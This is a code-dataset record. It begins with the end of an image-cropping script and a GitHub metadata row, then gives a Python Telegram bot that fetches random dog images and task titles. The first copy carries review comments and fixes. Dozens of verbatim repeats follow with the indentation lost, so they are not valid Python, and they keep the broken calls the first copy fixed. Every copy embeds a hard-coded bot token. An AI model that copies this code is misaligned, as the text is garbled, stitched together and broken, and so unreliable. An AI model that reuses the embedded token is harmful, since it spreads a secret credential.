    # Read one input image from disk with PIL; images are processed one at a time.
    image = Image.open("testing_image.jpg")
    # Run the detector/cropper; `cropped` is a numpy array (a slice of the
    # original image). The second argument (100) is the pixel buffer padded
    # around the predicted bounding box.
    cropped = cropping_process(image,100)
    #convert np array to image
    #cropped=Image.fromarray(cropped)
    #show the cropped image
    #plt.imshow(cropped)
|
[
"noreply@github.com"
] |
CHDRucf.noreply@github.com
|
66840c48630477e9476c31cbcc44282f6ccf3baa
|
4cf3f8845d64ed31737bd7795581753c6e682922
|
/.history/main_20200118152712.py
|
0186fc09328db4af75357886b308ea98a88c5429
|
[] |
no_license
|
rtshkmr/hack-roll
|
9bc75175eb9746b79ff0dfa9307b32cfd1417029
|
3ea480a8bf6d0067155b279740b4edc1673f406d
|
refs/heads/master
| 2021-12-23T12:26:56.642705
| 2020-01-19T04:26:39
| 2020-01-19T04:26:39
| 234,702,684
| 1
| 0
| null | 2021-12-13T20:30:54
| 2020-01-18T08:12:52
|
Python
|
UTF-8
|
Python
| false
| false
| 101,299
|
py
|
from telegram.ext import Updater, CommandHandler
import requests
import re
# NOTE(review): this request runs at module import time and hits the network;
# `image_url` computed here is never used below (bop() fetches its own URL
# via get_url()) — looks like dead startup code, confirm before removing.
# API call to source, get json (url is obtained):
contents = requests.get('https://random.dog/woof.json').json()
image_url = contents['url']
def get_url():
    """Fetch a random dog picture URL from the random.dog API."""
    payload = requests.get('https://random.dog/woof.json').json()
    return payload['url']
def get_tasks():
    """Fetch the task list from the nowwat API and return the task titles.

    Returns:
        list[str]: the 'title' field of each task object in the JSON response.

    Raises:
        requests.RequestException: if the HTTP request fails.
        KeyError: if a task object has no 'title' key.
    """
    response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
    # BUG FIX: the previous code called `response.map(...)` and `item.title` —
    # JavaScript idioms. Python lists have no .map() method and JSON objects
    # decode to dicts, so the old body always raised AttributeError.
    # assumes the endpoint returns a JSON array of objects each carrying a
    # "title" key — TODO confirm against the API.
    return [item['title'] for item in response]
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
    """Handle /bop: send a random dog photo to the chat the command came from."""
    photo_url = get_url()
    bot.send_photo(chat_id=update.message.chat_id, photo=photo_url)
def getTaskList(bot, update):
    """Send every task title from the nowwat API as its own Markdown message.

    BUG FIX: the old body passed the bare name `Markdown`, which is never
    defined anywhere in this module and raised NameError on first use.
    python-telegram-bot expects the string 'Markdown' via the `parse_mode`
    argument. The trailing semicolon was also dropped.
    """
    chat_id = update.message.chat_id
    for task in get_tasks():
        bot.sendMessage(chat_id, task, parse_mode='Markdown')
def main():
    """Start the Telegram bot and poll for updates until interrupted."""
    # NOTE(review): the bot token is hard-coded in source and therefore
    # public — it should be revoked and loaded from an environment variable.
    updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
    dp = updater.dispatcher
    # Only /bop is registered; getTaskList is defined above but never wired
    # to a command handler — presumably work-in-progress, confirm intent.
    dp.add_handler(CommandHandler('bop',bop))
    updater.start_polling()
    # Block the main thread so polling continues until Ctrl-C / SIGTERM.
    updater.idle()
if __name__ == '__main__':
    main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
bot.send_photo(chat_id=chat_id, photo=url)
def getTaskList(bot, update):
taskList = get_tasks()
chat_id = update.message.chat_id
for task in taskList:
bot.sendMessage(chat_id, task, Markdown);
def main():
updater = Updater('982938821:AAHiN0-7hIPahKJm6lWPyQ0UupOsuhP1GsQ')
dp = updater.dispatcher
dp.add_handler(CommandHandler('bop',bop))
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
def get_url():
contents = requests.get('https://random.dog/woof.json').json()
url = contents['url']
return url
def get_tasks():
response = requests.get('https://nowwat.herokuapp.com/api/tasks.json').json()
def extract_list(obj):
return obj.map(lambda item: item.title)
tasks = extract_list(response)
return tasks
# sending the image:
# we require:
# - the image URL
# - the recipient's ID: group/user id
def bop(bot, update):
# image url:
url = get_url()
# recipient's ID:
chat_id = update.message.chat_id
